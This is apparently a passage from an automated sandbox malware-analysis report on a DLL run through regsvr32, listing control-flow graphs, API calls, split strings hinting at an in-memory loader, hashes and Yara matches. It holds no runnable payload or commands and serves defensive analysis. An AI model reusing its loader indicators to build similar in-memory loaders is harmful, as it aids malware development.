10371->10379 10372->10373 10373->10357 10373->10365 10374->10375 10382 7ffa526a8d42 10374->10382 10376 7ffa526a8e5f 10375->10376 10380 7ffa526a3024 free 45 API calls 10375->10380 10376->10357 10383 7ffa526a3024 free 45 API calls 10376->10383 10377->10357 10385 7ffa526a6c34 realloc 45 API calls 10378->10385 10394 7ffa526a8bd4 wcsftime 10378->10394 10379->10368 10381 7ffa526a8b92 LCMapStringW 10379->10381 10380->10376 10381->10368 10389 7ffa526a6c34 realloc 45 API calls 10382->10389 10396 7ffa526a8d63 __initmbctable wcsftime 10382->10396 10383->10357 10384 7ffa526a8c23 LCMapStringW 10386 7ffa526a8c44 WideCharToMultiByte 10384->10386 10387 7ffa526a8c83 10384->10387 10385->10394 10386->10387 10387->10368 10390 7ffa526a3024 free 45 API calls 10387->10390 10388 7ffa526a8dc5 LCMapStringA 10391 7ffa526a8ded 10388->10391 10392 7ffa526a8df1 10388->10392 10389->10396 10390->10368 10391->10375 10397 7ffa526a3024 free 45 API calls 10391->10397 10395 7ffa526ae23c _wcstoui64 60 API calls 10392->10395 10394->10368 10394->10384 10395->10391 10396->10375 10396->10388 10397->10375 10398->10279 10400 7ffa526a6af6 10399->10400 10401 7ffa526a6adf 10399->10401 10404 7ffa526a309c __setargv 44 API calls 10400->10404 10413 7ffa526a6b0b 10400->10413 10402 7ffa526a7160 _FF_MSGBANNER 44 API calls 10401->10402 10403 7ffa526a6ae4 10402->10403 10405 7ffa526a6f0c _FF_MSGBANNER 44 API calls 10403->10405 10406 7ffa526a6b19 10404->10406 10407 7ffa526a6aec 10405->10407 10408 7ffa526a6b21 10406->10408 10409 7ffa526a6b30 10406->10409 10410 7ffa526a334c _lock 3 API calls 10407->10410 10411 7ffa526a67e0 _errno 44 API calls 10408->10411 10412 7ffa526a6ba0 _lock 44 API calls 10409->10412 10410->10400 10411->10413 10414 7ffa526a6b3a 10412->10414 10413->10083 10413->10087 10415 7ffa526a6b43 10414->10415 10416 7ffa526a6b72 10414->10416 10417 7ffa526a7ee4 _lock InitializeCriticalSectionAndSpinCount 10415->10417 10418 7ffa526a3024 free 44 API calls 10416->10418 10419 7ffa526a6b50 10417->10419 10420 7ffa526a6b61 LeaveCriticalSection 10418->10420 10419->10420 10422 7ffa526a3024 free 44 API calls 10419->10422 10420->10413 10423 7ffa526a6b5c 10422->10423 10424 7ffa526a67e0 _errno 44 API calls 10423->10424 10424->10420 10426 7ffa526a740a EncodePointer 10425->10426 10426->10426 10427 7ffa526a741f 10426->10427 10427->9827 10431 7ffa526a72d4 10428->10431 10444 7ffa526a3364 10431->10444 10446 7ffa526a6d01 10445->10446 10453 7ffa526a6d33 realloc 10445->10453 10447 7ffa526a6d0f 10446->10447 10446->10453 10448 7ffa526a67e0 _errno 44 API calls 10447->10448 10450 7ffa526a6d14 10448->10450 10449 7ffa526a6d4b RtlAllocateHeap 10452 7ffa526a6d2f 10449->10452 10449->10453 10451 7ffa526a66d8 _invalid_parameter_noinfo 7 API calls 10450->10451 10451->10452 10452->9831 10453->10449 10453->10452 10456 7ffa526a2e21 10455->10456 10484 7ffa526a2f42 10455->10484 10457 7ffa526a2e3c 10456->10457 10458 7ffa526a3024 free 45 API calls 10456->10458 10459 7ffa526a2e4a 10457->10459 10460 7ffa526a3024 free 45 API calls 10457->10460 10458->10457 10461 7ffa526a2e58 10459->10461 10462 7ffa526a3024 free 45 API calls 10459->10462 10460->10459 10463 7ffa526a2e66 10461->10463 10464 7ffa526a3024 free 45 API calls 10461->10464 10462->10461 10465 7ffa526a2e74 10463->10465 10466 7ffa526a3024 free 45 API calls 10463->10466 10464->10463 10467 7ffa526a2e82 10465->10467 10468 7ffa526a3024 free 45 API calls 10465->10468 10466->10465 10469 7ffa526a2e93 10467->10469 10471 7ffa526a3024 free 45 API calls 10467->10471 10468->10467 10470 7ffa526a2eab 10469->10470 10472 7ffa526a3024 free 45 API calls 10469->10472 10473 7ffa526a6ba0 _lock 45 API calls 10470->10473 10471->10469 10472->10470 10475 7ffa526a2eb5 10473->10475 10477 7ffa526a3024 free 45 API calls 10475->10477 10479 7ffa526a2ee3 10475->10479 10477->10479 10487 7ffa526a6a80 LeaveCriticalSection 10479->10487 10484->9859 10488 7ffa526a2050 10491 7ffa52661000 10488->10491 10492 7ffa5266101e ExitProcess 10491->10492

                                                                      Executed Functions

                                                                      Function 01020000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 8 1020000-1020460 call 1020aa8 * 2 VirtualAlloc 30 1020462-1020466 8->30 31 102048a-1020494 8->31 32 1020468-1020488 30->32 34 1020a91-1020aa6 31->34 35 102049a-102049e 31->35 32->31 32->32 35->34 36 10204a4-10204a8 35->36 36->34 37 10204ae-10204b2 36->37 37->34 38 10204b8-10204bf 37->38 38->34 39 10204c5-10204d2 38->39 39->34 40 10204d8-10204e1 39->40 40->34 41 10204e7-10204f4 40->41 41->34 42 10204fa-1020507 41->42 43 1020531-1020567 GetNativeSystemInfo 42->43 44 1020509-1020511 42->44 43->34 46 102056d-1020589 VirtualAlloc 43->46 45 1020513-1020518 44->45 47 1020521 45->47 48 102051a-102051f 45->48 49 10205a0-10205ac 46->49 50 102058b-102059e 46->50 51 1020523-102052f 47->51 48->51 52 10205af-10205b2 49->52 50->49 51->43 51->45 54 10205c1-10205db 52->54 55 10205b4-10205bf 52->55 56 102061b-1020622 54->56 57 10205dd-10205e2 54->57 55->52 58 10206db-10206e2 56->58 59 1020628-102062f 56->59 60 10205e4-10205ea 57->60 62 1020864-102086b 58->62 63 10206e8-10206f9 58->63 59->58 61 1020635-1020642 59->61 64 102060b-1020619 60->64 65 10205ec-1020609 60->65 61->58 68 1020648-102064f 61->68 66 1020871-102087f 62->66 67 1020917-1020929 62->67 69 1020702-1020705 63->69 64->56 64->60 65->64 65->65 72 102090e-1020911 66->72 70 1020a07-1020a1a 67->70 71 102092f-1020937 67->71 73 1020654-1020658 68->73 74 1020707-102070a 69->74 75 10206fb-10206ff 69->75 96 1020a40-1020a4a 70->96 97 1020a1c-1020a27 70->97 77 102093b-102093f 71->77 72->67 76 1020884-10208a9 72->76 78 10206c0-10206ca 73->78 79 1020788-102078e 74->79 80 102070c-102071d 74->80 75->69 102 1020907-102090c 76->102 103 10208ab-10208b1 76->103 83 1020945-102095a 77->83 84 10209ec-10209fa 77->84 81 102065a-1020669 78->81 82 10206cc-10206d2 78->82 85 1020794-10207a2 79->85 80->85 86 102071f-1020720 80->86 92 102067a-102067e 81->92 93 102066b-1020678 81->93 82->73 88 10206d4-10206d5 82->88 90 102097b-102097d 83->90 91 102095c-102095e 83->91 84->77 94 1020a00-1020a01 84->94 98 10207a8 85->98 99 102085d-102085e 85->99 95 1020722-1020784 86->95 88->58 107 10209a2-10209a4 90->107 108 102097f-1020981 90->108 104 1020960-102096c 91->104 105 102096e-1020979 91->105 109 1020680-102068a 92->109 110 102068c-1020690 92->110 106 10206bd-10206be 93->106 94->70 95->95 111 1020786 95->111 100 1020a7b-1020a8e 96->100 101 1020a4c-1020a54 96->101 112 1020a38-1020a3e 97->112 113 10207ae-10207d4 98->113 99->62 100->34 101->100 119 1020a56-1020a79 RtlAddFunctionTable 101->119 102->72 116 10208b3-10208b9 103->116 117 10208bb-10208c8 103->117 120 10209be-10209bf 104->120 105->120 106->78 114 10209a6-10209aa 107->114 115 10209ac-10209bb 107->115 121 1020983-1020987 108->121 122 1020989-102098b 108->122 123 10206b6-10206ba 109->123 124 1020692-10206a3 110->124 125 10206a5-10206a9 110->125 111->85 112->96 118 1020a29-1020a35 112->118 137 10207d6-10207d9 113->137 138 1020835-1020839 113->138 114->120 115->120 127 10208ea-10208fe 116->127 128 10208d3-10208e5 117->128 129 10208ca-10208d1 117->129 118->112 119->100 126 10209c5-10209cb 120->126 121->120 122->107 132 102098d-102098f 122->132 123->106 124->123 125->106 133 10206ab-10206b3 125->133 134 10209d9-10209e9 VirtualProtect 126->134 135 10209cd-10209d3 126->135 127->102 146 1020900-1020905 127->146 128->127 129->128 129->129 139 1020991-1020997 132->139 140 1020999-10209a0 132->140 133->123 134->84 135->134 142 10207e3-10207f0 137->142 143 10207db-10207e1 137->143 144 1020844-1020850 138->144 145 102083b 138->145 139->120 140->126 148 10207f2-10207f9 142->148 149 10207fb-102080d 142->149 147 1020812-102082c 143->147 144->113 150 1020856-1020857 144->150 145->144 146->103 147->138 152 102082e-1020833 147->152 148->148 148->149 149->147 150->99 152->137
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.443747782.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_1020000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: daac87e62bdd9427a4f63b8bdd19714c523ba83267ea0744a12218712c387fe4
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: D572E330618B588FDB69DF18C8856BAB7E1FB98305F10462EE8CBD7215DB34D542CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                      • API String ID: 0-464535774
                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 303 180010ff4-180011016 304 180011020 303->304 305 180011022-180011028 304->305 306 180011814 305->306 307 18001102e-180011034 305->307 308 180011819-18001181f 306->308 309 1800114e2-1800114ec 307->309 310 18001103a-180011040 307->310 308->305 311 180011825-180011832 308->311 314 1800114f5-18001151d 309->314 315 1800114ee-1800114f3 309->315 312 1800113e2-1800114d2 call 180008200 310->312 313 180011046-18001104c 310->313 312->311 323 1800114d8-1800114dd 312->323 313->308 318 180011052-18001120b call 180021040 call 1800291ac 313->318 316 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 314->316 315->316 333 1800117f9-180011803 316->333 329 180011212-1800113d7 call 1800291ac call 18001e2bc 318->329 330 18001120d 318->330 323->305 329->311 338 1800113dd 329->338 330->329 333->311 335 180011805-18001180f 333->335 335->305 338->304
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                      • API String ID: 0-3528011396
                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 339 180021618-180021653 340 180021655-18002165a 339->340 341 180021bf3-180021c25 340->341 342 180021660-180021665 340->342 343 180021c2a-180021c2f 341->343 344 180021a81-180021bda call 180016314 342->344 345 18002166b-180021670 342->345 346 180021838-180021845 343->346 347 180021c35 343->347 351 180021bdf-180021bee 344->351 348 1800219f3-180021a7c call 180001b1c 345->348 349 180021676-18002167b 345->349 347->340 348->340 352 1800219e4-1800219ee 349->352 353 180021681-180021686 349->353 351->340 352->340 355 1800219d5-1800219df call 18001dfb4 353->355 356 18002168c-180021691 353->356 355->340 358 180021697-18002169c 356->358 359 18002190c-1800219a5 call 18000abac 356->359 362 1800216a2-1800216a7 358->362 363 180021846-180021907 call 180021434 358->363 366 1800219aa-1800219b0 359->366 362->343 367 1800216ad-180021835 call 180008200 call 1800166c0 362->367 363->340 369 1800219b2-1800219c6 366->369 370 1800219cb-1800219d0 366->370 367->346 369->340 370->340
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                      • API String ID: 0-3036092626
                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180028C20 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 404 180028c20-180028c53 405 180028c58-180028c5e 404->405 406 180028c64-180028c6a 405->406 407 1800290ae-180029147 call 180013e28 405->407 408 1800290a4-1800290a9 406->408 409 180028c70-180028c76 406->409 414 18002914c-180029152 407->414 408->405 411 180029003-18002909f call 180008ea0 409->411 412 180028c7c-180028c82 409->412 411->405 416 180028c88-180028c8e 412->416 417 180028fab-180028ffe call 1800223c4 412->417 420 180029154 414->420 421 18002919c-1800291a8 414->421 418 180028c94-180028c9a 416->418 419 180028df6-180028e1e 416->419 417->405 424 180028d62-180028ddb call 180016bd8 418->424 425 180028ca0-180028ca6 418->425 419->405 427 180028e24-180028e3c 419->427 420->405 437 180028de0-180028de6 424->437 428 180028cac-180028cb2 425->428 429 180029159-180029197 call 1800164c8 425->429 431 180028e42-180028ee6 call 18001d49c 427->431 432 180028ee9-180028f0b 427->432 428->414 435 180028cb8-180028d5d call 180010c00 428->435 429->421 431->432 433 180028f94-180028f95 432->433 434 180028f11-180028f92 call 18001d49c 432->434 440 180028f98-180028f9b 433->440 434->440 435->405 437->421 442 180028dec-180028df1 437->442 440->405 445 180028fa1-180028fa6 440->445 442->405 445->405
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :G$Q27$_5$yy8x$Mh
                                                                      • API String ID: 0-3587547327
                                                                      • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                      • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                      • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                      • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 447 18000c608-18000c62d 448 18000c632-18000c637 447->448 449 18000cc8a-18000cc8f 448->449 450 18000c63d 448->450 451 18000cc95-18000cc9a 449->451 452 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 449->452 453 18000c643-18000c648 450->453 454 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 450->454 455 18000ce33-18000ced7 call 180008ad8 call 18001c32c 451->455 456 18000cca0-18000cca5 451->456 489 18000cfb4-18000d00a call 1800194a4 452->489 457 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 453->457 458 18000c64e-18000c653 453->458 481 18000cc28-18000cc85 call 1800194a4 454->481 493 18000cedc-18000cf26 call 1800194a4 455->493 462 18000cd35-18000cdce call 18000703c call 18001c32c 456->462 463 18000ccab-18000ccb0 456->463 457->448 465 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 458->465 466 18000c659-18000c65e 458->466 507 18000cdd3-18000ce2e call 1800194a4 462->507 470 18000ccb6-18000cd30 call 180021434 463->470 471 18000d00f-18000d014 463->471 465->448 473 18000c664-18000c669 466->473 474 18000c8bb-18000c963 call 180002610 call 18001c32c 466->474 470->448 471->448 479 18000d01a-18000d020 471->479 485 18000c7b2-18000c85a call 180019618 call 18001c32c 473->485 486 18000c66f-18000c674 473->486 514 18000c968-18000c9bc call 1800194a4 474->514 481->448 518 18000c85f-18000c8b6 call 1800194a4 485->518 486->471 496 18000c67a-18000c73d call 180002178 call 18001c32c 486->496 489->471 493->448 522 18000c742-18000c7ad call 1800194a4 496->522 507->448 514->448 518->448 522->448
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +#;)$K'$sf$w\H
                                                                      • API String ID: 0-1051058546
                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <4P$<8$<w.
                                                                      • API String ID: 0-1030867500
                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001C964 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: xDC
                                                                      • API String ID: 0-90241050
                                                                      • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                      • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                      • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                      • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2154 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 153 7ffa526a2154-7ffa526a2160 154 7ffa526a2162-7ffa526a216b call 7ffa526a4110 153->154 155 7ffa526a21e1-7ffa526a21e3 153->155 163 7ffa526a216d-7ffa526a216f 154->163 170 7ffa526a2174-7ffa526a217b call 7ffa526a2fa0 154->170 157 7ffa526a21e5-7ffa526a21ed 155->157 158 7ffa526a221e-7ffa526a2221 155->158 162 7ffa526a21f3-7ffa526a2201 157->162 157->163 159 7ffa526a2223-7ffa526a2232 call 7ffa526a2c88 call 7ffa526a3108 158->159 160 7ffa526a2279-7ffa526a227c 158->160 182 7ffa526a2237-7ffa526a223d 159->182 167 7ffa526a2285 160->167 168 7ffa526a227e-7ffa526a2280 call 7ffa526a2f50 160->168 164 7ffa526a2203 call 7ffa526a36d0 162->164 165 7ffa526a2208-7ffa526a220b 162->165 166 7ffa526a228a-7ffa526a228f 163->166 164->165 165->167 173 7ffa526a220d-7ffa526a221c call 7ffa526a3a48 call 7ffa526a2c94 call 7ffa526a415c 165->173 167->166 168->167 179 7ffa526a2184-7ffa526a21a9 call 7ffa526a40a0 GetCommandLineA call 7ffa526a3eec call 7ffa526a3758 170->179 180 7ffa526a217d-7ffa526a2182 call 7ffa526a415c 170->180 173->167 202 7ffa526a21b2-7ffa526a21b9 call 7ffa526a3df4 179->202 203 7ffa526a21ab-7ffa526a21b0 call 7ffa526a2c94 179->203 180->163 182->163 183 7ffa526a2243-7ffa526a2257 FlsSetValue 182->183 187 7ffa526a2259-7ffa526a226d call 7ffa526a2cbc GetCurrentThreadId 183->187 188 7ffa526a226f-7ffa526a2274 call 7ffa526a3024 183->188 187->167 188->163 208 7ffa526a21bb-7ffa526a21c2 call 7ffa526a3aec 202->208 209 7ffa526a21da-7ffa526a21df call 7ffa526a3a48 202->209 203->180 208->209 214 7ffa526a21c4-7ffa526a21c6 call 7ffa526a347c 208->214 209->203 216 7ffa526a21cb-7ffa526a21cd 214->216 216->209 217 7ffa526a21cf-7ffa526a21d5 216->217 217->167
                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A4110: HeapCreate.KERNELBASE(?,?,?,?,00007FFA526A2169), ref: 00007FFA526A4122
                                                                        • Part of subcall function 00007FFA526A4110: HeapSetInformation.KERNEL32 ref: 00007FFA526A414C
                                                                      • _RTC_Initialize.LIBCMT ref: 00007FFA526A2184
                                                                      • GetCommandLineA.KERNEL32 ref: 00007FFA526A2189
                                                                        • Part of subcall function 00007FFA526A3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA526A219B), ref: 00007FFA526A3F1B
                                                                        • Part of subcall function 00007FFA526A3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA526A219B), ref: 00007FFA526A3F5B
                                                                        • Part of subcall function 00007FFA526A3758: GetStartupInfoA.KERNEL32 ref: 00007FFA526A377D
                                                                      • __setargv.LIBCMT ref: 00007FFA526A21B2
                                                                      • _cinit.LIBCMT ref: 00007FFA526A21C6
                                                                        • Part of subcall function 00007FFA526A2C94: FlsFree.KERNEL32(?,?,?,?,00007FFA526A2217), ref: 00007FFA526A2CA3
                                                                        • Part of subcall function 00007FFA526A2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526A2217), ref: 00007FFA526A6A32
                                                                        • Part of subcall function 00007FFA526A2C94: free.LIBCMT ref: 00007FFA526A6A3B
                                                                        • Part of subcall function 00007FFA526A2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526A2217), ref: 00007FFA526A6A5B
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • FlsSetValue.KERNEL32 ref: 00007FFA526A224C
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFA526A2260
                                                                      • free.LIBCMT ref: 00007FFA526A226F
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                      • String ID:
                                                                      • API String ID: 1549890855-0
                                                                      • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
